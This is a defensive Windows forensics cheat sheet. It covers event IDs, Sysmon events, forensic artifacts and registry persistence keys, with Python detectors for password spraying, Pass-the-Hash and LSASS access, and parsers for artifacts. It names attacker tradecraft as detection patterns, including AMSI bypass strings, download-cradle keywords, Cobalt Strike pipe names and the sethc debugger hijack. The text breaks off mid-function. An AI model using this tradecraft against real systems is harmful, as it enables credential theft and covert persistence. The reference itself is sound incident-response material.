Windows Forensics & Event ID Quick Reference
How to use this sheet
Event IDs are grouped by category. Sysmon IDs are prefixed with S to distinguish them from native Windows events. All paths use %SystemRoot% = C:\Windows. Most Security-log events listed here only appear when the matching Advanced Audit Policy subcategory is enabled, so confirm the policy before treating silence as absence.
1. Critical Windows Event IDs
Authentication & Logon Events
| Event ID | Source | Meaning | Logon Type Key | Attack Relevance | Analyst Action |
|---|---|---|---|---|---|
| 4624 | Security | Successful logon | 2=Interactive, 3=Network, 4=Batch, 5=Service, 7=Unlock, 8=NetworkCleartext, 9=NewCredentials (runas /netonly), 10=RemoteInteractive, 11=CachedInteractive | Lateral movement (Type 3/10); Pass-the-Hash (Type 3 with AuthenticationPackageName=NTLM and LogonProcessName=NtLmSsp); Type 9 on the source host precedes Overpass-the-Hash with tools such as Mimikatz | Correlate IpAddress + TargetUserName + LogonType; flag off-hours/geo anomalies and Type 3 NTLM logons for accounts that normally use Kerberos |
| 4625 | Security | Failed logon | Same types; Status/SubStatus give the reason (0xC000006A wrong password, 0xC0000064 unknown user, 0xC0000234 locked out) | Brute force, password spray | Alert on >5/min per user or >10 distinct accounts per minute from a single IP |
| 4634 | Security | Account logged off (all logon types) | — | Session tracking | Correlate with 4624 on TargetLogonId for session duration |
| 4647 | Security | User-initiated logoff | — | Session tracking | Prefer over 4634 for interactive sessions |
| 4648 | Security | Logon attempted with explicit credentials | — | RunAs abuse, lateral movement, credential reuse | Check ProcessName, TargetUserName and TargetServerName; one host reaching many TargetServerNames within minutes is a lateral-movement pattern |
| 4672 | Security | Special privileges assigned to new logon | — | Admin-equivalent logon; accompanies the 4624 of any privileged account | Flag accounts that should not hold these privileges; correlate with 4624 on LogonId |
| 4778 | Security | Session reconnected to a window station (RDP/Terminal Services or fast user switching) | — | RDP lateral movement | Correlate ClientAddress with asset inventory; pair with 4624 Type 10 |
| 4779 | Security | Session disconnected from a window station | — | Session tracking | Long sessions may indicate persistent access |
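The thresholds in the 4625 row and the Pass-the-Hash indicator in the 4624 row, as detection logic run over exported records. This is an added example written for this sheet, not tooling from the page; records are plain dicts keyed by the Security-log field names that EvtxECmd or Get-WinEvent expose, and SAMPLE_EVENTS is constructed for illustration.

```python
"""Brute-force, password-spray and Pass-the-Hash triage over 4624/4625 records.

Added example for this sheet, not tooling from the page. Records are dicts
keyed by Security-log field names (EventID, TimeCreated, TargetUserName,
IpAddress, LogonType, AuthenticationPackageName, LogonProcessName).
SAMPLE_EVENTS is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=1)
SPRAY_MIN_ACCOUNTS = 10   # distinct accounts failing from one IP inside WINDOW
BRUTE_MIN_FAILURES = 5    # failures against one account inside WINDOW
LOCAL_SOURCES = {None, "", "-", "::1", "127.0.0.1"}


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def _burst(times, threshold, window):
    """True if `threshold` timestamps fall inside any span of length `window`."""
    times = sorted(times)
    lo = 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        if hi - lo + 1 >= threshold:
            return True
    return False


def detect_password_spray(events, window=WINDOW, min_accounts=SPRAY_MIN_ACCOUNTS):
    """One source IP failing against many distinct accounts within `window`.
    Returns {ip: set of accounts seen in the densest window}."""
    per_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625 and e.get("IpAddress") not in LOCAL_SOURCES:
            per_ip[e["IpAddress"]].append((_ts(e), e["TargetUserName"].lower()))
    hits = {}
    for ip, items in per_ip.items():
        items.sort()
        best, lo = set(), 0
        for hi in range(len(items)):
            while items[hi][0] - items[lo][0] > window:
                lo += 1
            accounts = {acct for _, acct in items[lo:hi + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            hits[ip] = best
    return hits


def detect_brute_force(events, window=WINDOW, min_failures=BRUTE_MIN_FAILURES):
    """Accounts with `min_failures` or more 4625s inside `window`, from any source."""
    per_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            per_user[e["TargetUserName"].lower()].append(_ts(e))
    return sorted(u for u, t in per_user.items() if _burst(t, min_failures, window))


def pass_the_hash_candidates(events):
    """4624 LogonType 3 authenticated by NtLmSsp/NTLM for a real user account.
    Normal in NTLM-heavy environments, so treat the result as a pivot list to
    check against the host's usual Kerberos use, not as a verdict."""
    out = []
    for e in events:
        if e["EventID"] != 4624 or str(e.get("LogonType")) != "3":
            continue
        if e.get("LogonProcessName", "").strip().lower() != "ntlmssp":
            continue
        if e.get("AuthenticationPackageName", "").upper() != "NTLM":
            continue
        user = e["TargetUserName"]
        if user.endswith("$") or user.upper() == "ANONYMOUS LOGON":
            continue
        out.append((e["IpAddress"], user))
    return out


def _ev(eid, ts, user, ip, **extra):
    rec = {"EventID": eid, "TimeCreated": ts, "TargetUserName": user, "IpAddress": ip}
    rec.update(extra)
    return rec


# Constructed sample: a spray from 10.0.0.5, a brute force against svc_backup
# from 10.0.0.9, and one NTLM network logon by a real user from the spraying host.
SAMPLE_EVENTS = (
    [_ev(4625, f"2024-03-01T02:14:{i:02d}", f"user{i:02d}", "10.0.0.5") for i in range(12)]
    + [_ev(4625, f"2024-03-01T03:00:{i * 5:02d}", "svc_backup", "10.0.0.9") for i in range(6)]
    + [
        _ev(4624, "2024-03-01T02:15:30", "administrator", "10.0.0.5", LogonType=3,
            LogonProcessName="NtLmSsp ", AuthenticationPackageName="NTLM"),
        _ev(4624, "2024-03-01T02:15:31", "WS01$", "10.0.0.7", LogonType=3,
            LogonProcessName="NtLmSsp ", AuthenticationPackageName="NTLM"),
        _ev(4624, "2024-03-01T02:15:32", "jsmith", "10.0.0.8", LogonType=3,
            LogonProcessName="Kerberos", AuthenticationPackageName="Kerberos"),
    ]
)

if __name__ == "__main__":
    print("spray:", {ip: len(a) for ip, a in detect_password_spray(SAMPLE_EVENTS).items()})
    print("brute force:", detect_brute_force(SAMPLE_EVENTS))
    print("PtH candidates:", pass_the_hash_candidates(SAMPLE_EVENTS))
```

Feed it the EventData of real records (EvtxECmd CSV, or Get-WinEvent output converted to dicts) and tune WINDOW and the thresholds to the domain's lockout policy; a spray deliberately stays under the lockout count per account, which is why the spray detector counts distinct accounts per source rather than failures per account.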
Process & Execution Events
| Event ID | Source | Meaning | Key Fields | Attack Relevance | Analyst Action |
|---|---|---|---|---|---|
| 4688 | Security | Process creation | NewProcessName, CommandLine, ParentProcess, SubjectUserName | Execution detection; requires audit policy + process CLI audit enabled | Alert on cmd.exe/powershell.exe spawned from Office; check parent-child |
| 4689 | Security | Process termination | — | Short-lived processes (defense evasion) | Correlate with 4688; very short runtime = suspicious |
Scheduled Tasks & Services
| Event ID | Source | Meaning | Key Fields | Attack Relevance | Analyst Action |
|---|---|---|---|---|---|
| 4698 | Security | Scheduled task created (requires Audit Other Object Access Events; Microsoft-Windows-TaskScheduler/Operational 106 is the fallback) | TaskName, TaskContent (task XML), SubjectUserName | Persistence (T1053.005) | Alert on tasks created outside change windows; inspect the XML for Command/Arguments and the RunAs principal |
| 4699 | Security | Scheduled task deleted | TaskName, SubjectUserName | Evidence removal | Correlate with prior 4698 |
| 4700/4701 | Security | Scheduled task enabled/disabled | TaskName | Tampering with existing tasks | Alert on changes to existing tasks |
| 4702 | Security | Scheduled task updated | TaskName, TaskContentNew | Persistence by modifying a legitimate task | Diff TaskContentNew against the XML from the original 4698 |
| 4697 | Security | Service installed (requires Audit Security System Extension; Win10/2016+) | ServiceName, ServiceFileName, ServiceAccount | Persistence (T1543.003); PsExec-style remote execution | Same checks as 7045; present on the target of PsExec-style tools even when 7045 has been cleared from System |
| 7045 | System | New service installed | ServiceName, ImagePath, AccountName | Persistence (T1543.003); malware installs as a service | Alert on non-standard service names and on ImagePath outside %SystemRoot%/%ProgramFiles% |
| 7036 | System | Service state changed | ServiceName, State | Security service stopped | Alert on stops of Defender, EDR, Sysmon or the Windows Event Log service |
Account Management Events
| Event ID | Source | Meaning | Attack Relevance | Analyst Action |
|---|---|---|---|---|
| 4720 | Security | User account created | Persistence; adding backdoor accounts | Alert on creation outside provisioning systems |
| 4722 | Security | Account enabled | Re-enabling disabled accounts | Alert on enabling dormant/legacy accounts |
| 4723 | Security | Password change attempt (old password supplied) | Credential manipulation | Alert when not from expected systems |
| 4724 | Security | Password reset attempt (admin, old password not required) | Forced reset; admin credential abuse | Alert on bulk resets or off-hours resets |
| 4725 | Security | Account disabled | Account takeover covering tracks | Alert on disabling IT/security accounts |
| 4726 | Security | Account deleted | Evidence removal | Alert on deletion during incidents |
| 4732 | Security | Member added to security-enabled local group (e.g. Administrators, Remote Desktop Users) | Privilege escalation on the host | Alert on additions to Administrators, Remote Desktop Users, Backup Operators |
| 4728 | Security | Member added to security-enabled global group (e.g. Domain Admins) | Domain privilege escalation | Alert on any addition to Domain Admins and other Tier 0 groups; 4756 is the equivalent for universal groups such as Enterprise Admins and Schema Admins |
| 4733 | Security | Member removed from security-enabled local group | Covering tracks | Alert on removals from high-privilege groups; 4729 (global) and 4757 (universal) are the domain-group equivalents |
| 4740 | Security | Account locked out | Brute force / password spray | Alert on >3 lockouts; correlate source workstation names and IPs |
Kerberos & NTLM Events (logged on the DC that served the request; merge logs from all DCs)
| Event ID | Source | Meaning | Key Fields | Attack Relevance | Analyst Action |
|---|---|---|---|---|---|
| 4768 | Security | Kerberos TGT requested (AS-REQ) | TargetUserName, IpAddress, TicketEncryptionType, PreAuthType, Status | AS-REP Roasting (PreAuthType=0); Overpass-the-Hash (RC4 where AES is standard). A forged TGT (Golden Ticket) never produces a 4768: its first trace is a 4769 with no preceding 4768 from that client | Flag PreAuthType 0; flag TicketEncryptionType 0x17 (RC4) from clients that otherwise use 0x12/0x11 (AES); flag IPs outside AD subnets |
| 4769 | Security | Kerberos service ticket requested (TGS-REQ) | ServiceName, TargetUserName, IpAddress, TicketEncryptionType | Kerberoasting (RC4 tickets for many SPN accounts); Golden Ticket use | Alert on 0x17 where ServiceName is not a machine account ($) or krbtgt; alert on one client requesting many distinct ServiceNames within minutes |
| 4771 | Security | Kerberos pre-authentication failed | TargetUserName, IpAddress, Status (failure code) | Kerberos password spraying/brute force (the Kerberos counterpart of 4625); accounts without pre-auth never generate this | Alert on 0x18 (wrong password) in volume per IP; 0x12 = account disabled, expired or locked out |
| 4776 | Security | NTLM credential validation (MSV1_0) | Workstation, TargetUserName, Status | Pass-the-Hash; NTLM relay; password spray via NTLM | Alert on unexpected NTLM from modern workstations; 0xC000006A = wrong password, 0xC0000064 = unknown user |
Audit & Log Integrity Events
| Event ID | Source | Meaning | Attack Relevance | Analyst Action |
|---|---|---|---|---|
| 1102 | Security | Audit log cleared | Defense evasion (T1070.001) | Immediate escalation — correlate with prior activity |
| 104 | System | System log cleared | Defense evasion | Immediate escalation |
| 4719 | Security | System audit policy changed | Disabling audit (T1562.002) | Alert on any policy change |
Sysmon Events (requires Sysmon deployment; logged to Microsoft-Windows-Sysmon/Operational)
| Sysmon ID | Meaning | Key Fields | Attack Relevance | Analyst Action |
|---|---|---|---|---|
| S1 | Process create | Image, CommandLine, ParentImage, ParentCommandLine, Hashes, User, OriginalFileName | Gold standard for execution detection; OriginalFileName exposes renamed binaries | Build parent-child trees; hash reputation lookup; compare the Image filename with OriginalFileName |
| S2 | File creation time changed | TargetFilename, CreationUtcTime, PreviousCreationUtcTime, Image | Timestomping (T1070.006) | Fires only on explicit changes; compare the two times and the Image (explorer.exe and installers do this legitimately); cross-check $MFT $STANDARD_INFORMATION against $FILE_NAME |
| S3 | Network connection | DestinationIp, DestinationPort, Image, User, Initiated | C2 beaconing; lateral movement | Beacon detection (regular intervals, fixed sizes); flag outbound connections from processes that should not talk to the network (Office apps, rundll32, regsvr32) |
| S6 | Driver loaded | ImageLoaded, Hashes, Signed, Signature | Rootkits; bring-your-own-vulnerable-driver | Alert on unsigned drivers and on known-vulnerable signed drivers by hash |
| S7 | Image (DLL) loaded | ImageLoaded, Signed, Hashes, Image | DLL search-order hijacking; sideloading; injection | Alert on unsigned DLLs loaded by trusted processes and on DLLs loaded from user-writable paths |
| S8 | CreateRemoteThread | SourceImage, TargetImage, StartAddress, StartFunction | Process injection (T1055) | Alert on cross-process thread creation, especially with a StartAddress not backed by a module |
| S10 | ProcessAccess | SourceImage, TargetImage, GrantedAccess, CallTrace | Credential dumping from lsass.exe (T1003.001) | Alert on access to lsass.exe from non-baselined SourceImages whose GrantedAccess includes PROCESS_VM_READ (0x10) or is PROCESS_ALL_ACCESS (0x1FFFFF); CallTrace entries marked UNKNOWN point at unbacked (injected) code. Do not key on the user: legitimate and malicious readers both run as SYSTEM |
| S11 | File created | TargetFilename, Image | Dropper activity; ransomware | Alert on high-volume file creation and suspicious extensions in user-writable paths |
| S12 | Registry object added/deleted | TargetObject, Image | Registry persistence | Monitor Run/RunOnce and the keys in section 3; alert on new entries |
| S13 | Registry value set | TargetObject, Details, Image | Registry persistence/evasion | Alert on security-relevant keys; Details holds the new value |
| S15 | File stream created (ADS) | TargetFilename, Contents, Hash | NTFS ADS hiding (T1564.004) | Zone.Identifier streams are normal for downloads; alert on any other ADS outside known software |
| S17/S18 | Named pipe created/connected | PipeName, Image | Cobalt Strike/lateral movement | Alert on default CS pipe names (\postex_*, \msagent_*, \MSSE-*-server, \mojo.*) and on pipes created by unexpected images; operators rename them, so baseline pipe-creating images too |
| S22 | DNS query | QueryName, QueryResults, Image | C2 via DNS; DGA domains | Alert on high-entropy domains, unusual TLDs and queries from processes that should not resolve names |
| S25 | ProcessTampering | Image, Type | Process hollowing/herpaderping | Alert on any event; allowlist the few browsers/installers that trigger it legitimately |
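The S10 row's advice, turned into triage code: decode GrantedAccess into PROCESS_* rights, skip a baseline of source images, and rank what is left so handles that can read or write LSASS memory come first. This is an added example for this sheet, not Sysmon's own tooling; the allowlist and SAMPLE_EVENTS are constructed, and the allowlist in particular must be rebuilt from the telemetry of the environment it is used in.

```python
"""Sysmon Event ID 10 (ProcessAccess) triage for lsass.exe.

Added example for this sheet, not from Sysmon. ALLOWLIST and SAMPLE_EVENTS are
constructed; rebuild the allowlist from your own telemetry before relying on it.
"""
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
READ_MASK = 0x0010                      # PROCESS_VM_READ: enough to dump memory
WRITE_MASK = 0x0002 | 0x0008 | 0x0020   # thread/operation/write: injection into LSASS

# Hypothetical baseline of images that open lsass.exe during normal operation.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def decode_access(mask):
    """Hex string or int GrantedAccess -> list of right names, lowest bit first."""
    if isinstance(mask, str):
        mask = int(mask, 16)
    if (mask & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def score_access(mask, call_trace=""):
    """3 = all access or write rights, 2 = read, 1 = query only; +1 when the
    CallTrace has a frame with no backing module (UNKNOWN), i.e. injected code."""
    if isinstance(mask, str):
        mask = int(mask, 16)
    if (mask & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS or mask & WRITE_MASK:
        score = 3
    elif mask & READ_MASK:
        score = 2
    else:
        score = 1
    return score + (1 if "UNKNOWN" in call_trace.upper() else 0)


def triage_lsass_access(events, allowlist=ALLOWLIST):
    """(score, SourceImage, rights) for Sysmon 10 events on lsass.exe, highest first."""
    findings = []
    for e in events:
        if e.get("EventID") != 10 or not e["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        if e["SourceImage"].lower() in allowlist:
            continue
        score = score_access(e["GrantedAccess"], e.get("CallTrace", ""))
        findings.append((score, e["SourceImage"], decode_access(e["GrantedAccess"])))
    return sorted(findings, key=lambda f: -f[0])


_TRACE = r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2bd8e"


def _ev(source, access, call_trace=_TRACE):
    return {"EventID": 10, "SourceImage": source, "GrantedAccess": access,
            "TargetImage": r"C:\Windows\system32\lsass.exe", "CallTrace": call_trace}


# Constructed sample records in the shape Sysmon writes to EventData.
SAMPLE_EVENTS = [
    _ev(r"C:\Windows\System32\svchost.exe", "0x1400"),    # allowlisted, dropped
    _ev(r"C:\Windows\System32\Taskmgr.exe", "0x1400"),    # query only
    _ev(r"C:\Temp\pd64.exe", "0x1FFFFF"),                 # full access (procdump-style)
    _ev(r"C:\Users\bob\Desktop\mk.exe", "0x1010"),        # VM_READ + QUERY_LIMITED
    _ev(r"C:\Windows\System32\notepad.exe", "0x38",       # write rights from unbacked code
        r"UNKNOWN(00007FF6A2C11000)|C:\Windows\SYSTEM32\ntdll.dll+9d4c4"),
]

if __name__ == "__main__":
    for score, image, rights in triage_lsass_access(SAMPLE_EVENTS):
        print(score, image, ", ".join(rights))
```

The ranking deliberately ignores the User field: credential dumpers normally run as SYSTEM, and so do the legitimate readers, so the discriminators are the source image, the rights requested and whether the call stack is backed by a module.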
PowerShell Events (4103/4104 in Microsoft-Windows-PowerShell/Operational; 400/403 in the classic Windows PowerShell log)
| Event ID | Source | Meaning | Attack Relevance | Analyst Action |
|---|---|---|---|---|
| 4103 | PowerShell | Module/pipeline execution (Module Logging) | Obfuscated cmdlets; download cradles | Decode base64 arguments; flag IEX/Invoke-Expression, DownloadString, Net.WebClient |
| 4104 | PowerShell | Script block logging | Best PowerShell visibility: each script block is logged as it executes, so nested or obfuscated layers appear decoded in later 4104s | Alert on AMSI bypass patterns (AmsiUtils, amsiInitFailed), Add-MpPreference -ExclusionPath, Set-MpPreference -Disable*; Windows writes Warning-level 4104s for blocks it considers suspicious even when the policy is off |
| 400/403 | PowerShell | Engine start/stop | Rapid PowerShell invocations; HostApplication shows the launching command line | Correlate with process events; EngineVersion 2.0 indicates a downgrade attack to escape 4104 logging |
2. Windows Forensic Artifacts Quick Reference
| Artifact | Location | What It Reveals | Forensic Tool |
|---|---|---|---|
| Prefetch | %SystemRoot%\Prefetch\*.pf | Program execution (name, run count, last 8 run times on Win8+, one on Win7); disabled by default on Server SKUs and capped at 1024 files on Win8+ | WinPrefetchView, PECmd (Eric Zimmerman) |
| Shimcache (AppCompatCache) | HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache | Files that touched disk (exe path + modified time); NOT proof of execution on Win10+. The key is only written at shutdown, so parse it from the SYSTEM hive of an offline image | AppCompatCacheParser |
| Amcache | %SystemRoot%\AppCompat\Programs\Amcache.hve | Program execution evidence; SHA1 of the first 31 MB of the executable | AmcacheParser |
| UserAssist | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count (value names ROT13-encoded) | GUI program execution by user; run count + last run time | UserAssist.exe, RegRipper, Registry Explorer |
| RecentDocs | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs | Files opened by user, grouped by extension | RegRipper |
| MRU Lists | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32 (OpenSavePidlMRU, LastVisitedPidlMRU) | Files opened via Open/Save dialogs and the application that opened them | RegRipper |
| LNK Files | %APPDATA%\Microsoft\Windows\Recent\ | File/folder access (local or network); original MAC times, volume serial, host name | LECmd, LNKParser |
| Jump Lists | %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\ and CustomDestinations\ | Per-app recently opened files | JLECmd |
| Shellbags | HKCU\Software\Microsoft\Windows\Shell\BagMRU (NTUSER.DAT) and HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU (UsrClass.dat, the main store on Win7+) | Folders accessed (including deleted/network/USB) | ShellBagsExplorer |
| NTFS $MFT | Root of each NTFS volume | Full file system metadata; hard-deleted file traces; $STANDARD_INFORMATION vs $FILE_NAME timestamps for timestomp detection | MFTECmd, Autopsy |
| NTFS $LogFile | Root of each NTFS volume | NTFS transaction log: file ops (creates, renames, deletes) over a short recent window | LogFileParser |
| USN Journal | %SystemDrive%\$Extend\$UsnJrnl:$J (alternate data stream) | Recent file system changes; retention depends on journal size (32 MB by default) and activity, from hours on busy volumes to weeks on quiet ones | MFTECmd (-f $J) |
| Registry Hives | %SystemRoot%\System32\config\ (SAM, SECURITY, SOFTWARE, SYSTEM, DEFAULT); RegBack\ copies are empty by default since Win10 1803 | System config, user accounts, installed software | RegRipper, Registry Explorer |
| NTUSER.DAT / UsrClass.dat | %USERPROFILE%\NTUSER.DAT and %LOCALAPPDATA%\Microsoft\Windows\UsrClass.dat | Per-user registry hives (UsrClass.dat holds Shellbags, per-user COM registrations and MUICache) | Registry Explorer |
| Windows Event Logs | %SystemRoot%\System32\winevt\Logs\ | See Section 1 | Event Log Explorer, EvtxECmd |
| Browser History (Chrome) | %LOCALAPPDATA%\Google\Chrome\User Data\Default\History | SQLite DB: visited URLs, search terms, downloads | DB Browser, Hindsight |
| Browser History (Edge) | %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\History | Same format as Chrome | DB Browser, Hindsight |
| Browser History (Firefox) | %APPDATA%\Mozilla\Firefox\Profiles\*.default*\places.sqlite | SQLite DB: history + bookmarks | DB Browser |
| Recycle Bin | C:\$Recycle.Bin\<SID>\ | Deleted files ($I<id> = original path, size and deletion time; $R<id> = content) | Rifiuti2, RBCmd |
| Volume Shadow Copies | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy* | Historical file versions, including registry hives and event logs before they were cleared | vssadmin list shadows; ShadowExplorer |
| Hibernation File | %SystemDrive%\hiberfil.sys | Compressed memory snapshot taken at hibernate (may contain credentials, encryption keys) | Volatility, Hibernation Recon |
| Page File | %SystemDrive%\pagefile.sys | Swapped memory contents | Strings analysis, Volatility |
| SRUM | %SystemRoot%\System32\sru\SRUDB.dat | Network/CPU/GPU usage per app in hourly records (roughly 30 to 60 days of history) | SrumECmd |
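Two of the artifacts above have simple binary layouts that are worth being able to decode by hand when the usual tools are not at hand: the Recycle Bin $I files and UserAssist values. The decoders below are an added example for this sheet, not the page's tooling; the sample $I file and UserAssist value are constructed in the file with the builder helpers rather than taken from a real system.

```python
"""Decoders for Recycle Bin $I files and UserAssist registry values.

Added example for this sheet, not from the page. Samples are constructed by
the build_* helpers, so the module runs offline.
"""
import codecs
import struct
from datetime import datetime, timedelta, timezone

_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return _EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return ((dt - _EPOCH) // timedelta(microseconds=1)) * 10


def parse_recycle_bin_i(data):
    """Parse a $I file. Version 1 (Vista to 8.1) has a fixed 520-byte name field;
    version 2 (Windows 10+) has a 4-byte character count and then the UTF-16LE name."""
    version, size, ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        raw = data[24:24 + 520]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)
        raw = data[28:28 + nchars * 2]
    else:
        raise ValueError(f"unknown $I version {version}")
    name = raw.decode("utf-16-le").split("\x00", 1)[0]
    return {"version": version, "size": size,
            "deleted": filetime_to_datetime(ft), "original_path": name}


def decode_userassist(value_name, value_data):
    """Decode one UserAssist Count entry (Windows 7+ 72-byte layout): ROT13 name,
    run count at offset 4, last-execution FILETIME at offset 60."""
    program = codecs.decode(value_name, "rot_13")
    (run_count,) = struct.unpack_from("<I", value_data, 4)
    (ft,) = struct.unpack_from("<Q", value_data, 60)
    last_run = filetime_to_datetime(ft) if ft else None
    return {"program": program, "run_count": run_count, "last_run": last_run}


# Constructed sample data (no real system involved).
SAMPLE_TIME = datetime(2024, 3, 1, 2, 15, 30, tzinfo=timezone.utc)
SAMPLE_PATH = r"C:\Users\bob\Documents\payroll.xlsx"


def build_sample_i_file(version=2, path=SAMPLE_PATH, size=48213, deleted=SAMPLE_TIME):
    ft = datetime_to_filetime(deleted)
    encoded = (path + "\x00").encode("utf-16-le")
    if version == 2:
        return struct.pack("<QQQI", 2, size, ft, len(path) + 1) + encoded
    return struct.pack("<QQQ", 1, size, ft) + encoded.ljust(520, b"\x00")


def build_sample_userassist(program=r"C:\Users\bob\Desktop\mk.exe", run_count=3,
                            last_run=SAMPLE_TIME):
    name = codecs.encode(program, "rot_13")       # what the registry actually stores
    data = bytearray(72)
    struct.pack_into("<I", data, 4, run_count)
    struct.pack_into("<Q", data, 60, datetime_to_filetime(last_run))
    return name, bytes(data)


if __name__ == "__main__":
    print(parse_recycle_bin_i(build_sample_i_file()))
    print(decode_userassist(*build_sample_userassist()))
```

On a live system the $I files are read directly from C:\$Recycle.Bin\<SID>\ and the UserAssist values from the NTUSER.DAT hive (with python-registry or after `reg export`); the $I version byte tells you which layout applies, so check it before trusting the path offset.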
3. Registry Persistence Locations
| Registry Key Path | Persistence Type | Runs As | Detection Method |
|---|---|---|---|
| HKCU\Software\Microsoft\Windows\CurrentVersion\Run | User logon autostart | Logged-in user | Sysmon S12/S13; RegRipper; Autoruns |
| HKLM\Software\Microsoft\Windows\CurrentVersion\Run | System-wide logon autostart | Each user at logon | Same; also check the Wow6432Node copy on 64-bit hosts |
| HKCU\...\RunOnce | One-time execution at next logon | Logged-in user | Entry is deleted after it runs, so capture it before reboot |
| HKLM\...\RunOnce | One-time execution at next logon | Each user at logon | Same |
| HKLM\SYSTEM\CurrentControlSet\Services\<name> | Service-based persistence | Service account (commonly SYSTEM) | EID 7045/4697; check ImagePath and Parameters\ServiceDll |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (Userinit, Shell) | Winlogon hijack | Logged-in user at logon | Defaults are Userinit=C:\Windows\system32\userinit.exe, (trailing comma) and Shell=explorer.exe; anything appended to either value is malicious |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<exe> | Debugger hijack (T1546.012) | Whoever launches <exe> | Alert on any Debugger value; the classic target is sethc.exe or utilman.exe pointed at cmd.exe |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\ | IE/legacy BHO | Logged-in user (inside IE) | Legacy; still seen in enterprise |
| HKLM\SYSTEM\CurrentControlSet\Control\Lsa (Authentication Packages, Security Packages) and Lsa\OSConfig\Security Packages | SSP/AP injection (T1547.002, T1547.005) | SYSTEM (loaded into lsass.exe at boot) | Alert on any change; a new entry means a DLL is loaded into LSASS |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ | Winlogon notification package | SYSTEM | Only honoured on XP/2003; on modern Windows a new key here is an artifact of an attacker's script, not working persistence |
| HKCU\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ | COM hijack via context menu | Logged-in user | Baseline and alert on new entries |
| HKCU\SOFTWARE\Classes\CLSID\<clsid>\InprocServer32 | COM object hijack (T1546.015): HKCU entries shadow the HKLM registration | Logged-in user | Sysmon S12/S13 on this path; compare against HKLM\SOFTWARE\Classes\CLSID |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler | COM object loaded by Explorer at logon (not a scheduled task) | Logged-in user | Rare; immediate alert |
| HKCU\Environment (UserInitMprLogonScript) | Logon script (T1037.001) | Logged-in user | Alert on any value |
| HKLM\SOFTWARE\Policies\Microsoft\Windows\System (Scripts) and HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts | Group Policy startup/logon scripts | SYSTEM (startup) or logged-in user (logon) | Check GPO and registry |
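A triage pass over a Regedit export of the keys above, as an added example for this sheet (not the page's tooling): it parses the .reg text into keys and values, then flags Winlogon values that differ from the defaults given in the table, any IFEO Debugger, and Run/RunOnce entries pointing into user-writable paths. SAMPLE_REG is constructed; the path patterns are a starting point rather than a baseline and will flag legitimate per-user installers such as OneDrive until those are allowlisted.

```python
"""Triage of a Regedit (.reg) export against this section's persistence keys.

Added example for this sheet, not from the page. Export with
`reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" out.reg`
(and the other keys), then open the file with encoding="utf-16" and pass the
text in. SAMPLE_REG is constructed.
"""
import re

WINLOGON = r"HKEY_LO" r"CAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
WINLOGON_DEFAULTS = {"Userinit": r"C:\Windows\system32\userinit.exe,", "Shell": "explorer.exe"}
IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.IGNORECASE)
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _unescape(raw):
    """Undo .reg escaping: \\ -> \ and \" -> "."""
    return re.sub(r"\\(.)", r"\1", raw)


def parse_reg_export(text):
    """Minimal Regedit 5.00 parser -> {key_path: {value_name: data}}.
    REG_SZ strings are unescaped; dword:/hex: values are kept as raw text."""
    keys, current = {}, None
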